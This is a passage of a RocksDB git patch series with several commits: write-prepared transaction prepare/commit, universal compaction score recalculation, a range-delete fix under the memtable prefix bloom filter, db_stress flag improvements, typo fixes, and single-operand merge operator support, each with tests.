PessimisticTransaction::Initialize(txn_options); } @@ -35,9 +36,18 @@ Status WritePreparedTxn::CommitBatch(WriteBatch* /* unused */) { } Status WritePreparedTxn::PrepareInternal() { - // TODO(myabandeh) Implement this - throw std::runtime_error("Prepare not Implemented"); - return Status::OK(); + WriteOptions write_options = write_options_; + write_options.disableWAL = false; +
WriteBatchInternal::MarkEndPrepare(GetWriteBatch()->GetWriteBatch(), name_); + const bool disable_memtable = true; + uint64_t seq_used; + Status s = + db_impl_->WriteImpl(write_options, GetWriteBatch()->GetWriteBatch(), + /*callback*/ nullptr, &log_number_, /*log ref*/ 0, + !disable_memtable, &seq_used); + prepare_seq_ = seq_used; + wpt_db_->AddPrepared(prepare_seq_); + return s; } Status WritePreparedTxn::CommitWithoutPrepareInternal() { @@ -47,9 +57,24 @@ Status WritePreparedTxn::CommitWithoutPrepareInternal() { } Status WritePreparedTxn::CommitInternal() { - // TODO(myabandeh) Implement this - throw std::runtime_error("Commit not Implemented"); - return Status::OK(); + // We take the commit-time batch and append the Commit marker. + // The Memtable will ignore the Commit marker in non-recovery mode + WriteBatch* working_batch = GetCommitTimeWriteBatch(); + // TODO(myabandeh): prevent the users from writing to txn after the prepare + // phase + assert(working_batch->Count() == 0); + WriteBatchInternal::MarkCommit(working_batch, name_); + + // any operations appended to this working_batch will be ignored from WAL + working_batch->MarkWalTerminationPoint(); + + const bool disable_memtable = true; + uint64_t seq_used; + auto s = db_impl_->WriteImpl(write_options_, working_batch, nullptr, nullptr, + log_number_, disable_memtable, &seq_used); + uint64_t& commit_seq = seq_used; + wpt_db_->AddCommitted(prepare_seq_, commit_seq); + return s; } Status WritePreparedTxn::Rollback() { diff --git a/utilities/transactions/write_prepared_txn.h b/utilities/transactions/write_prepared_txn.h index c0feb2207e3..b7cc6ba1b09 100644 --- a/utilities/transactions/write_prepared_txn.h +++ b/utilities/transactions/write_prepared_txn.h @@ -25,13 +25,14 @@ #include "rocksdb/utilities/transaction_db.h" #include "rocksdb/utilities/write_batch_with_index.h" #include "util/autovector.h" -#include "utilities/transactions/transaction_base.h" #include "utilities/transactions/pessimistic_transaction.h" +#include "utilities/transactions/pessimistic_transaction_db.h" +#include "utilities/transactions/transaction_base.h" #include "utilities/transactions/transaction_util.h" namespace rocksdb { -class TransactionDBImpl; +class WritePreparedTxnDB; // This impl could write to DB also uncommitted data and then later tell apart // committed data from uncommitted data. Uncommitted data could be after the // prepare phase in 2PC (WritePreparedTxn) or before that // (WriteUnpreparedTxnImpl). class WritePreparedTxn : public PessimisticTransaction { public: - WritePreparedTxn(TransactionDB* db, const WriteOptions& write_options, - const TransactionOptions& txn_options); + WritePreparedTxn(WritePreparedTxnDB* db, const WriteOptions& write_options, + const TransactionOptions& txn_options); virtual ~WritePreparedTxn() {} @@ -65,6 +66,9 @@ class WritePreparedTxn : public PessimisticTransaction { // No copying allowed WritePreparedTxn(const WritePreparedTxn&); void operator=(const WritePreparedTxn&); + + WritePreparedTxnDB* wpt_db_; + uint64_t prepare_seq_; }; } // namespace rocksdb From 1c8dbe2aa20855c0d9322154bd14c0ab65ecd083 Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Wed, 16 Aug 2017 18:41:18 -0700 Subject: [PATCH 119/205] update scores after picking universal compaction Summary: We forgot to recompute compaction scores after picking a universal compaction like we do in level compaction (https://github.com/facebook/rocksdb/blob/a34b2e388ee51173e44f6aa290f1301c33af9e67/db/compaction_picker.cc#L691-L695).
This leads to a fairness issue where we waste compactions on CFs/DB instances that don't need it while others can starve. Previously, ccecf3f4fb8e6eeaa06504b9d477b6db4137831a fixed the issue for the read-amp-based compaction case; this PR avoids the issue earlier and also for size-ratio-based compactions. Closes https://github.com/facebook/rocksdb/pull/2688 Differential Revision: D5566191 Pulled By: ajkr fbshipit-source-id: 010bccb2a107f6a76f3d3022b90aadce5cc48feb --- db/compaction_picker_universal.cc | 1 + db/db_universal_compaction_test.cc | 48 +++++++++++++++++++++++++----- 2 files changed, 41 insertions(+), 8 deletions(-) diff --git a/db/compaction_picker_universal.cc b/db/compaction_picker_universal.cc index ce480267c44..14533fbcdd2 100644 --- a/db/compaction_picker_universal.cc +++ b/db/compaction_picker_universal.cc @@ -373,6 +373,7 @@ Compaction* UniversalCompactionPicker::PickCompaction( c->inputs(0)->size()); RegisterCompaction(c); + vstorage->ComputeCompactionScore(ioptions_, mutable_cf_options); TEST_SYNC_POINT_CALLBACK("UniversalCompactionPicker::PickCompaction:Return", c); diff --git a/db/db_universal_compaction_test.cc b/db/db_universal_compaction_test.cc index ca7ebac8ecd..58fda80d549 100644 --- a/db/db_universal_compaction_test.cc +++ b/db/db_universal_compaction_test.cc @@ -696,17 +696,12 @@ TEST_P(DBTestUniversalCompactionParallel, PickByFileNumberBug) { num_keys -= 100; } - // Wait for the 2nd background compaction process to start - TEST_SYNC_POINT("DBTestUniversalCompactionParallel::PickByFileNumberBug:0"); - TEST_SYNC_POINT("DBTestUniversalCompactionParallel::PickByFileNumberBug:1"); - - // Hold the 1st and 2nd compaction from finishing + // Hold the 1st compaction from finishing TEST_SYNC_POINT("DBTestUniversalCompactionParallel::PickByFileNumberBug:2"); dbfull()->TEST_WaitForCompact(); - // Although 2 compaction threads started, the second one did not compact - // anything because the number of files not being compacted is less than - // level0_file_num_compaction_trigger + // There should only be one picked compaction as the score drops below one + // after the first one is picked. EXPECT_EQ(total_picked_compactions, 1); EXPECT_EQ(TotalTableFiles(), 4); @@ -1411,6 +1406,7 @@ TEST_P(DBTestUniversalCompaction, FullCompactionInBottomPriThreadPool) { ASSERT_EQ(NumSortedRuns(), 1); rocksdb::SyncPoint::GetInstance()->DisableProcessing(); } + Env::Default()->SetBackgroundThreads(0, Env::Priority::BOTTOM); } TEST_P(DBTestUniversalCompaction, ConcurrentBottomPriLowPriCompactions) { @@ -1465,6 +1461,42 @@ TEST_P(DBTestUniversalCompaction, ConcurrentBottomPriLowPriCompactions) { ASSERT_GT(NumTableFilesAtLevel(0), 0); ASSERT_GT(NumTableFilesAtLevel(num_levels_ - 1), 0); rocksdb::SyncPoint::GetInstance()->DisableProcessing(); + Env::Default()->SetBackgroundThreads(0, Env::Priority::BOTTOM); +} + +TEST_P(DBTestUniversalCompaction, RecalculateScoreAfterPicking) { + // Regression test for extra compactions scheduled. Once enough compactions + // have been scheduled to bring the score below one, we should stop + // scheduling more; otherwise, other CFs/DBs may be delayed unnecessarily. 
+ const int kNumFilesTrigger = 8; + Options options = CurrentOptions(); + options.compaction_options_universal.max_merge_width = kNumFilesTrigger / 2; + options.compaction_options_universal.max_size_amplification_percent = + static_cast<unsigned int>(-1); + options.compaction_style = kCompactionStyleUniversal; + options.level0_file_num_compaction_trigger = kNumFilesTrigger; + options.num_levels = num_levels_; + options.write_buffer_size = 100 << 10; // 100KB + Reopen(options); + + std::atomic<int> num_compactions_attempted(0); + rocksdb::SyncPoint::GetInstance()->SetCallBack( + "DBImpl::BackgroundCompaction:Start", [&](void* arg) { + ++num_compactions_attempted; + }); + rocksdb::SyncPoint::GetInstance()->EnableProcessing(); + + Random rnd(301); + for (int num = 0; num < kNumFilesTrigger; num++) { + ASSERT_EQ(NumSortedRuns(), num); + int key_idx = 0; + GenerateNewFile(&rnd, &key_idx); + } + dbfull()->TEST_WaitForCompact(); + // Compacting the first four files was enough to bring the score below one so + // there's no need to schedule any more compactions. + ASSERT_EQ(1, num_compactions_attempted); + ASSERT_EQ(NumSortedRuns(), 5); } INSTANTIATE_TEST_CASE_P(UniversalCompactionNumLevels, DBTestUniversalCompaction, From af012c0f830826c115503926d2786edc4d3b2498 Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Wed, 16 Aug 2017 19:00:46 -0700 Subject: [PATCH 120/205] fix deleterange with memtable prefix bloom Summary: the range delete tombstones in memtable should be added to the aggregator even when the memtable's prefix bloom filter tells us the lookup key's not there. This bug could cause data to temporarily reappear until the memtable containing range deletions is flushed. Reported in #2743. Closes https://github.com/facebook/rocksdb/pull/2745 Differential Revision: D5639007 Pulled By: ajkr fbshipit-source-id: 04fc6facb6f978340a3f639536f4ca7c0d73dfc9 --- HISTORY.md | 1 + db/db_range_del_test.cc | 26 ++++++++++++++++++++++++++ db/memtable.cc | 15 ++++++++------- 3 files changed, 35 insertions(+), 7 deletions(-) diff --git a/HISTORY.md b/HISTORY.md index 29f0f3f2701..89e5967569f 100644 --- a/HISTORY.md +++ b/HISTORY.md @@ -8,6 +8,7 @@ ### Bug Fixes * Fix wrong latencies in `rocksdb.db.get.micros`, `rocksdb.db.write.micros`, and `rocksdb.sst.read.micros`. * Fix incorrect dropping of deletions during intra-L0 compaction. +* Fix transient reappearance of keys covered by range deletions when memtable prefix bloom filter is enabled. ## 5.7.0 (07/13/2017) ### Public API Change diff --git a/db/db_range_del_test.cc b/db/db_range_del_test.cc index 0288f80bdde..d80c9d14495 100644 --- a/db/db_range_del_test.cc +++ b/db/db_range_del_test.cc @@ -868,6 +868,32 @@ TEST_F(DBRangeDelTest, SubcompactionHasEmptyDedicatedRangeDelFile) { db_->ReleaseSnapshot(snapshot); } +TEST_F(DBRangeDelTest, MemtableBloomFilter) { + // regression test for #2743.
the range delete tombstones in memtable should + // be added even when Get() skips searching due to its prefix bloom filter + const int kMemtableSize = 1 << 20; // 1MB + const int kMemtablePrefixFilterSize = 1 << 13; // 8KB + const int kNumKeys = 1000; + const int kPrefixLen = 8; + Options options = CurrentOptions(); + options.memtable_prefix_bloom_size_ratio = + static_cast<double>(kMemtablePrefixFilterSize) / kMemtableSize; + options.prefix_extractor.reset(rocksdb::NewFixedPrefixTransform(kPrefixLen)); + options.write_buffer_size = kMemtableSize; + Reopen(options); + + for (int i = 0; i < kNumKeys; ++i) { + ASSERT_OK(Put(Key(i), "val")); + } + Flush(); + ASSERT_OK(db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(), Key(0), + Key(kNumKeys))); + for (int i = 0; i < kNumKeys; ++i) { + std::string value; + ASSERT_TRUE(db_->Get(ReadOptions(), Key(i), &value).IsNotFound()); + } +} + #endif // ROCKSDB_LITE } // namespace rocksdb diff --git a/db/memtable.cc b/db/memtable.cc index efea6199af2..a24989123b3 100644 --- a/db/memtable.cc +++ b/db/memtable.cc @@ -643,6 +643,14 @@ bool MemTable::Get(const LookupKey& key, std::string* value, Status* s, } PERF_TIMER_GUARD(get_from_memtable_time); + std::unique_ptr<InternalIterator> range_del_iter( + NewRangeTombstoneIterator(read_opts)); + Status status = range_del_agg->AddTombstones(std::move(range_del_iter)); + if (!status.ok()) { + *s = status; + return false; + } + Slice user_key = key.user_key(); bool found_final_value = false; bool merge_in_progress = s->IsMergeInProgress(); @@ -658,13 +666,6 @@ bool MemTable::Get(const LookupKey& key, std::string* value, Status* s, if (prefix_bloom_) { PERF_COUNTER_ADD(bloom_memtable_hit_count, 1); } - std::unique_ptr<InternalIterator> range_del_iter( - NewRangeTombstoneIterator(read_opts)); - Status status = range_del_agg->AddTombstones(std::move(range_del_iter)); - if (!status.ok()) { - *s = status; - return false; - } Saver saver; saver.status = s; saver.found_final_value = &found_final_value; From 23593171c42e88ea1c6d288dd1ab6f2b65bdbbe1 Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Wed, 16 Aug 2017 19:03:18 -0700 Subject: [PATCH 121/205] minor improvements to db_stress Summary: fix some things that made this command hard to use from the CLI: - use default values for `target_file_size_base` and `max_bytes_for_level_base`. previously we were using small values for these but the default value of `write_buffer_size`, which led to an enormous number of L1 files. - add a failure message for `value_size_mult` being too big. previously there was just an assert, so in non-debug mode it'd overrun the value buffer and crash mysteriously. - only print verification success if there's no failure. before, it'd print both in the failure case.
- support `memtable_prefix_bloom_size_ratio` - support `num_bottom_pri_threads` (universal compaction) Closes https://github.com/facebook/rocksdb/pull/2741 Differential Revision: D5629495 Pulled By: ajkr fbshipit-source-id: ddad97d6d4ba0884e7c0f933b0a359712514fc1d --- tools/db_stress.cc | 42 ++++++++++++++++++++++++++++++++++-------- 1 file changed, 34 insertions(+), 8 deletions(-) diff --git a/tools/db_stress.cc b/tools/db_stress.cc index c7153f2e943..7a4837f18e6 100644 --- a/tools/db_stress.cc +++ b/tools/db_stress.cc @@ -72,6 +72,8 @@ using GFLAGS::RegisterFlagValidator; using GFLAGS::SetUsageMessage; static const long KB = 1024; +static const int kRandomValueMaxFactor = 3; +static const int kValueMaxLen = 100; static bool ValidateUint32Range(const char* flagname, uint64_t value) { if (value > std::numeric_limits<uint32_t>::max()) { @@ -174,6 +176,11 @@ DEFINE_int32(max_write_buffer_number_to_maintain, "after they are flushed. If this value is set to -1, " "'max_write_buffer_number' will be used."); +DEFINE_double(memtable_prefix_bloom_size_ratio, + rocksdb::Options().memtable_prefix_bloom_size_ratio, + "creates prefix blooms for memtables, each with size " + "`write_buffer_size * memtable_prefix_bloom_size_ratio`."); + DEFINE_int32(open_files, rocksdb::Options().max_open_files, "Maximum number of files to keep open at the same time " "(use default if == 0)"); @@ -205,6 +212,10 @@ DEFINE_int32(max_background_compactions, "The maximum number of concurrent background compactions " "that can occur in parallel."); +DEFINE_int32(num_bottom_pri_threads, 0, + "The number of threads in the bottom-priority thread pool (used " + "by universal compaction only)."); + DEFINE_int32(compaction_thread_pool_adjust_interval, 0, "The interval (in milliseconds) to adjust compaction thread pool " "size.
Don't change it periodically if the value is 0."); @@ -317,13 +328,15 @@ extern std::vector rocksdb_kill_prefix_blacklist; DEFINE_bool(disable_wal, false, "If true, do not write WAL for write."); -DEFINE_int32(target_file_size_base, 64 * KB, +DEFINE_int32(target_file_size_base, rocksdb::Options().target_file_size_base, "Target level-1 file size for compaction"); DEFINE_int32(target_file_size_multiplier, 1, "A multiplier to compute target level-N file size (N >= 2)"); -DEFINE_uint64(max_bytes_for_level_base, 256 * KB, "Max bytes for level-1"); +DEFINE_uint64(max_bytes_for_level_base, + rocksdb::Options().max_bytes_for_level_base, + "Max bytes for level-1"); DEFINE_double(max_bytes_for_level_multiplier, 2, "A multiplier to compute max bytes for level-N (N >= 2)"); @@ -1121,8 +1134,6 @@ class StressTest { ToString(FLAGS_write_buffer_size / 4), ToString(FLAGS_write_buffer_size / 8), }}, - {"memtable_prefix_bloom_bits", {"0", "8", "10"}}, - {"memtable_prefix_bloom_probes", {"4", "5", "6"}}, {"memtable_huge_page_size", {"0", ToString(2 * 1024 * 1024)}}, {"max_successive_merges", {"0", "2", "4"}}, {"inplace_update_num_locks", {"100", "200", "300"}}, @@ -1250,7 +1261,7 @@ class StressTest { threads[i] = nullptr; } auto now = FLAGS_env->NowMicros(); - if (!FLAGS_test_batches_snapshots) { + if (!FLAGS_test_batches_snapshots && !shared.HasVerificationFailedYet()) { fprintf(stdout, "%s Verification successful\n", FLAGS_env->TimeToString(now/1000000).c_str()); } @@ -2021,7 +2032,7 @@ class StressTest { return false; } // compare value_from_db with the value in the shared state - char value[100]; + char value[kValueMaxLen]; uint32_t value_base = shared->Get(cf, key); if (value_base == SharedState::SENTINEL && !strict) { return true; @@ -2064,7 +2075,8 @@ class StressTest { } static size_t GenerateValue(uint32_t rand, char *v, size_t max_sz) { - size_t value_sz = ((rand % 3) + 1) * FLAGS_value_size_mult; + size_t value_sz = + ((rand % kRandomValueMaxFactor) + 1) * FLAGS_value_size_mult; assert(value_sz <= max_sz && value_sz >= sizeof(uint32_t)); *((uint32_t*)v) = rand; for (size_t i=sizeof(uint32_t); i < value_sz; i++) { @@ -2162,6 +2174,8 @@ class StressTest { FLAGS_min_write_buffer_number_to_merge; options_.max_write_buffer_number_to_maintain = FLAGS_max_write_buffer_number_to_maintain; + options_.memtable_prefix_bloom_size_ratio = + FLAGS_memtable_prefix_bloom_size_ratio; options_.max_background_compactions = FLAGS_max_background_compactions; options_.max_background_flushes = FLAGS_max_background_flushes; options_.compaction_style = @@ -2406,7 +2420,8 @@ int main(int argc, char** argv) { // The number of background threads should be at least as much the // max number of concurrent compactions. 
FLAGS_env->SetBackgroundThreads(FLAGS_max_background_compactions); - + FLAGS_env->SetBackgroundThreads(FLAGS_num_bottom_pri_threads, + rocksdb::Env::Priority::BOTTOM); if (FLAGS_prefixpercent > 0 && FLAGS_prefix_size <= 0) { fprintf(stderr, "Error: prefixpercent is non-zero while prefix_size is " @@ -2419,6 +2434,12 @@ int main(int argc, char** argv) { "test_batches_snapshots test!\n"); exit(1); } + if (FLAGS_memtable_prefix_bloom_size_ratio > 0.0 && FLAGS_prefix_size <= 0) { + fprintf(stderr, + "Error: please specify positive prefix_size in order to use " + "memtable_prefix_bloom_size_ratio\n"); + exit(1); + } if ((FLAGS_readpercent + FLAGS_prefixpercent + FLAGS_writepercent + FLAGS_delpercent + FLAGS_delrangepercent + FLAGS_iterpercent) != 100) { @@ -2450,6 +2471,11 @@ int main(int argc, char** argv) { } else if (FLAGS_active_width == 0) { FLAGS_active_width = FLAGS_max_key; } + if (FLAGS_value_size_mult * kRandomValueMaxFactor > kValueMaxLen) { + fprintf(stderr, "Error: value_size_mult can be at most %d\n", + kValueMaxLen / kRandomValueMaxFactor); + exit(1); + } // Choose a location for the test database if none given with --db= if (FLAGS_db.empty()) { From ac8fb77afd669f399e084a338d620c0a6cff827e Mon Sep 17 00:00:00 2001 From: follitude Date: Wed, 16 Aug 2017 21:45:32 -0700 Subject: [PATCH 122/205] fix some misspellings Summary: PTAL ajkr Closes https://github.com/facebook/rocksdb/pull/2750 Differential Revision: D5648052 Pulled By: ajkr fbshipit-source-id: 7cd1ddd61364d5a55a10fdd293fa74b2bf89dd98 --- db/db_impl_write.cc | 2 +- options/cf_options.h | 2 +- utilities/blob_db/blob_db_test.cc | 4 ++-- utilities/transactions/pessimistic_transaction_db.cc | 2 +- 4 files changed, 5 insertions(+), 5 deletions(-) diff --git a/db/db_impl_write.cc b/db/db_impl_write.cc index 512819772ea..8a11948f7e3 100644 --- a/db/db_impl_write.cc +++ b/db/db_impl_write.cc @@ -1081,7 +1081,7 @@ Status DBImpl::SwitchMemtable(ColumnFamilyData* cfd, WriteContext* context) { SuperVersion* new_superversion = nullptr; const MutableCFOptions mutable_cf_options = *cfd->GetLatestMutableCFOptions(); - // Set current_memtble_info for memtable sealed callback + // Set memtable_info for memtable sealed callback #ifndef ROCKSDB_LITE MemTableInfo memtable_info; memtable_info.cf_name = cfd->GetName(); diff --git a/options/cf_options.h b/options/cf_options.h index df5b460fc73..f376729f853 100644 --- a/options/cf_options.h +++ b/options/cf_options.h @@ -83,7 +83,7 @@ struct ImmutableCFOptions { bool advise_random_on_open; // This options is required by PlainTableReader. 
May need to move it - // to PlainTalbeOptions just like bloom_bits_per_key + // to PlainTableOptions just like bloom_bits_per_key uint32_t bloom_locality; bool purge_redundant_kvs_while_flush; diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index 28d4d5b8dea..be42c395b9d 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -617,7 +617,7 @@ TEST_F(BlobDBTest, GCAfterOverwriteKeys) { VerifyDB(data); } -TEST_F(BlobDBTest, GCRelocateKeyWhileOverwritting) { +TEST_F(BlobDBTest, GCRelocateKeyWhileOverwriting) { Random rnd(301); BlobDBOptions bdb_options; bdb_options.disable_background_tasks = true; @@ -650,7 +650,7 @@ TEST_F(BlobDBTest, GCRelocateKeyWhileOverwritting) { VerifyDB({{"foo", "v2"}}); } -TEST_F(BlobDBTest, GCExpiredKeyWhileOverwritting) { +TEST_F(BlobDBTest, GCExpiredKeyWhileOverwriting) { Random rnd(301); Options options; options.env = mock_env_.get(); diff --git a/utilities/transactions/pessimistic_transaction_db.cc b/utilities/transactions/pessimistic_transaction_db.cc index 156e7a12b0d..08b0dfa7ba4 100644 --- a/utilities/transactions/pessimistic_transaction_db.cc +++ b/utilities/transactions/pessimistic_transaction_db.cc @@ -332,7 +332,7 @@ Transaction* PessimisticTransactionDB::BeginInternalTransaction( // All user Put, Merge, Delete, and Write requests must be intercepted to make // sure that they lock all keys that they are writing to avoid causing conflicts -// with any concurent transactions. The easiest way to do this is to wrap all +// with any concurrent transactions. The easiest way to do this is to wrap all // write operations in a transaction. // // Put(), Merge(), and Delete() only lock a single key per call. Write() will From 9a44b4c32c5dd472b8c8dc76289342055da8bfc4 Mon Sep 17 00:00:00 2001 From: Sagar Vemuri Date: Wed, 16 Aug 2017 23:38:04 -0700 Subject: [PATCH 123/205] Allow merge operator to be called even with a single operand Summary: Added a function `MergeOperator::AllowSingleOperand()` to allow invoking a merge operator even with a single merge operand, if overridden. This is needed for Cassandra-on-RocksDB work. All Cassandra writes are through merges and this will allow a single merge-value to be updated in the merge-operator invoked via a compaction, if needed, due to an expired TTL. Closes https://github.com/facebook/rocksdb/pull/2721 Differential Revision: D5608706 Pulled By: sagar0 fbshipit-source-id: f299f9f91c4d1ac26e48bd5906e122c1c5e5f3fc --- HISTORY.md | 1 + db/compaction_iterator_test.cc | 105 +++++++++++++++++++++++++++++++ db/merge_helper.cc | 30 ++++++++- db/merge_helper.h | 18 +----- include/rocksdb/merge_operator.h | 7 +++ 5 files changed, 144 insertions(+), 17 deletions(-) diff --git a/HISTORY.md b/HISTORY.md index 89e5967569f..fc6c55874db 100644 --- a/HISTORY.md +++ b/HISTORY.md @@ -4,6 +4,7 @@ * Add Iterator::Refresh(), which allows users to update the iterator state so that they can avoid some initialization costs of recreating iterators. * Replace dynamic_cast<> (except unit test) so people can choose to build with RTTI off. With make, release mode is by default built with -fno-rtti and debug mode is built without it. Users can override it by setting USE_RTTI=0 or 1. * Universal compactions including the bottom level can be executed in a dedicated thread pool. This alleviates head-of-line blocking in the compaction queue, which cause write stalling, particularly in multi-instance use cases.
Users can enable this feature via `Env::SetBackgroundThreads(N, Env::Priority::BOTTOM)`, where `N > 0`. +* Allow merge operator to be called even with a single merge operand during compactions, by appropriately overriding `MergeOperator::AllowSingleOperand`. ### Bug Fixes * Fix wrong latencies in `rocksdb.db.get.micros`, `rocksdb.db.write.micros`, and `rocksdb.sst.read.micros`. diff --git a/db/compaction_iterator_test.cc b/db/compaction_iterator_test.cc index b625c99ffaa..dfc4139363b 100644 --- a/db/compaction_iterator_test.cc +++ b/db/compaction_iterator_test.cc @@ -455,6 +455,111 @@ TEST_F(CompactionIteratorTest, ShuttingDownInMerge) { EXPECT_EQ(2, filter.last_seen.load()); } +TEST_F(CompactionIteratorTest, SingleMergeOperand) { + class Filter : public CompactionFilter { + virtual Decision FilterV2(int level, const Slice& key, ValueType t, + const Slice& existing_value, + std::string* new_value, + std::string* skip_until) const override { + std::string k = key.ToString(); + std::string v = existing_value.ToString(); + + // See InitIterators() call below for the sequence of keys and their + // filtering decisions. Here we closely assert that compaction filter is + // called with the expected keys and only them, and with the right values. + if (k == "a") { + EXPECT_EQ(ValueType::kMergeOperand, t); + EXPECT_EQ("av1", v); + return Decision::kKeep; + } else if (k == "b") { + EXPECT_EQ(ValueType::kMergeOperand, t); + return Decision::kKeep; + } else if (k == "c") { + return Decision::kKeep; + } + + ADD_FAILURE(); + return Decision::kKeep; + } + + const char* Name() const override { + return "CompactionIteratorTest.SingleMergeOperand::Filter"; + } + }; + + class SingleMergeOp : public MergeOperator { + public: + bool FullMergeV2(const MergeOperationInput& merge_in, + MergeOperationOutput* merge_out) const override { + // See InitIterators() call below for why "c" is the only key for which + // FullMergeV2 should be called. + EXPECT_EQ("c", merge_in.key.ToString()); + + std::string temp_value; + if (merge_in.existing_value != nullptr) { + temp_value = merge_in.existing_value->ToString(); + } + + for (auto& operand : merge_in.operand_list) { + temp_value.append(operand.ToString()); + } + merge_out->new_value = temp_value; + + return true; + } + + bool PartialMergeMulti(const Slice& key, + const std::deque& operand_list, + std::string* new_value, + Logger* logger) const override { + std::string string_key = key.ToString(); + EXPECT_TRUE(string_key == "a" || string_key == "b"); + + if (string_key == "a") { + EXPECT_EQ(1, operand_list.size()); + } else if (string_key == "b") { + EXPECT_EQ(2, operand_list.size()); + } + + std::string temp_value; + for (auto& operand : operand_list) { + temp_value.append(operand.ToString()); + } + swap(temp_value, *new_value); + + return true; + } + + const char* Name() const override { + return "CompactionIteratorTest SingleMergeOp"; + } + + bool AllowSingleOperand() const override { return true; } + }; + + SingleMergeOp merge_op; + Filter filter; + InitIterators( + // a should invoke PartialMergeMulti with a single merge operand. + {test::KeyStr("a", 50, kTypeMerge), + // b should invoke PartialMergeMulti with two operands. + test::KeyStr("b", 70, kTypeMerge), test::KeyStr("b", 60, kTypeMerge), + // c should invoke FullMerge due to kTypeValue at the beginning. 
+ test::KeyStr("c", 90, kTypeMerge), test::KeyStr("c", 80, kTypeValue)}, + {"av1", "bv2", "bv1", "cv2", "cv1"}, {}, {}, kMaxSequenceNumber, + &merge_op, &filter); + + c_iter_->SeekToFirst(); + ASSERT_TRUE(c_iter_->Valid()); + ASSERT_EQ(test::KeyStr("a", 50, kTypeMerge), c_iter_->key().ToString()); + ASSERT_EQ("av1", c_iter_->value().ToString()); + c_iter_->Next(); + ASSERT_TRUE(c_iter_->Valid()); + ASSERT_EQ("bv1bv2", c_iter_->value().ToString()); + c_iter_->Next(); + ASSERT_EQ("cv1cv2", c_iter_->value().ToString()); +} + } // namespace rocksdb int main(int argc, char** argv) { diff --git a/db/merge_helper.cc b/db/merge_helper.cc index 625de27c2b5..55f8254cf0d 100644 --- a/db/merge_helper.cc +++ b/db/merge_helper.cc @@ -18,6 +18,33 @@ namespace rocksdb { +MergeHelper::MergeHelper(Env* env, const Comparator* user_comparator, + const MergeOperator* user_merge_operator, + const CompactionFilter* compaction_filter, + Logger* logger, bool assert_valid_internal_key, + SequenceNumber latest_snapshot, int level, + Statistics* stats, + const std::atomic* shutting_down) + : env_(env), + user_comparator_(user_comparator), + user_merge_operator_(user_merge_operator), + compaction_filter_(compaction_filter), + shutting_down_(shutting_down), + logger_(logger), + assert_valid_internal_key_(assert_valid_internal_key), + allow_single_operand_(false), + latest_snapshot_(latest_snapshot), + level_(level), + keys_(), + filter_timer_(env_), + total_filter_time_(0U), + stats_(stats) { + assert(user_comparator_ != nullptr); + if (user_merge_operator_) { + allow_single_operand_ = user_merge_operator_->AllowSingleOperand(); + } +} + Status MergeHelper::TimedFullMerge(const MergeOperator* merge_operator, const Slice& key, const Slice* value, const std::vector& operands, @@ -288,7 +315,8 @@ Status MergeHelper::MergeUntil(InternalIterator* iter, // Attempt to use the user's associative merge function to // merge the stacked merge operands into a single operand. s = Status::MergeInProgress(); - if (merge_context_.GetNumOperands() >= 2) { + if (merge_context_.GetNumOperands() >= 2 || + (allow_single_operand_ && merge_context_.GetNumOperands() == 1)) { bool merge_success = false; std::string merge_result; { diff --git a/db/merge_helper.h b/db/merge_helper.h index 59da47a6b0b..b9ef12a4cff 100644 --- a/db/merge_helper.h +++ b/db/merge_helper.h @@ -34,22 +34,7 @@ class MergeHelper { const CompactionFilter* compaction_filter, Logger* logger, bool assert_valid_internal_key, SequenceNumber latest_snapshot, int level = 0, Statistics* stats = nullptr, - const std::atomic* shutting_down = nullptr) - : env_(env), - user_comparator_(user_comparator), - user_merge_operator_(user_merge_operator), - compaction_filter_(compaction_filter), - shutting_down_(shutting_down), - logger_(logger), - assert_valid_internal_key_(assert_valid_internal_key), - latest_snapshot_(latest_snapshot), - level_(level), - keys_(), - filter_timer_(env_), - total_filter_time_(0U), - stats_(stats) { - assert(user_comparator_ != nullptr); - } + const std::atomic* shutting_down = nullptr); // Wrapper around MergeOperator::FullMergeV2() that records perf statistics. // Result of merge will be written to result if status returned is OK. @@ -158,6 +143,7 @@ class MergeHelper { const std::atomic* shutting_down_; Logger* logger_; bool assert_valid_internal_key_; // enforce no internal key corruption? 
+ bool allow_single_operand_; SequenceNumber latest_snapshot_; int level_; diff --git a/include/rocksdb/merge_operator.h b/include/rocksdb/merge_operator.h index 5fe3e0bfda8..f2947100553 100644 --- a/include/rocksdb/merge_operator.h +++ b/include/rocksdb/merge_operator.h @@ -183,6 +183,13 @@ class MergeOperator { // no checking is enforced. Client is responsible for providing // consistent MergeOperator between DB opens. virtual const char* Name() const = 0; + + // Determines whether the MergeOperator can be called with just a single + // merge operand. + // Override and return true for allowing a single operand. FullMergeV2 and + // PartialMerge/PartialMergeMulti should be implemented accordingly to handle + // a single operand. + virtual bool AllowSingleOperand() const { return false; } }; // The simpler, associative merge operator. From 8f2598ac9d730bf0a7c08b9cdb6071fd7b73ba3b Mon Sep 17 00:00:00 2001 From: Sagar Vemuri Date: Thu, 17 Aug 2017 14:42:54 -0700 Subject: [PATCH 124/205] Enable Cassandra merge operator to be called with a single merge operand Summary: Updating Cassandra merge operator to make use of a single merge operand when needed. Single merge operand support has been introduced in #2721. Closes https://github.com/facebook/rocksdb/pull/2753 Differential Revision: D5652867 Pulled By: sagar0 fbshipit-source-id: b9fbd3196d3ebd0b752626dbf9bec9aa53e3e26a --- utilities/cassandra/merge_operator.h | 2 ++ 1 file changed, 2 insertions(+) diff --git a/utilities/cassandra/merge_operator.h b/utilities/cassandra/merge_operator.h index 679474075e5..28066ca0591 100644 --- a/utilities/cassandra/merge_operator.h +++ b/utilities/cassandra/merge_operator.h @@ -26,6 +26,8 @@ class CassandraValueMergeOperator : public MergeOperator { Logger* logger) const override; virtual const char* Name() const override; + + virtual bool AllowSingleOperand() const override { return true; } }; } // namespace cassandra } // namespace rocksdb From 29877ec7b44b41a37a0766035a2ebe07bf56f663 Mon Sep 17 00:00:00 2001 From: yiwu-arbug Date: Thu, 17 Aug 2017 14:47:17 -0700 Subject: [PATCH 125/205] Fix blob db crash during calculating write amp Summary: On initial call to BlobDBImpl::WaStats() `all_periods_write_` would be empty, so it will crash when we call pop_front() at line 1627. Apparently it is meant to pop only when `all_periods_write_.size() > kWriteAmplificationStatsPeriods`. The 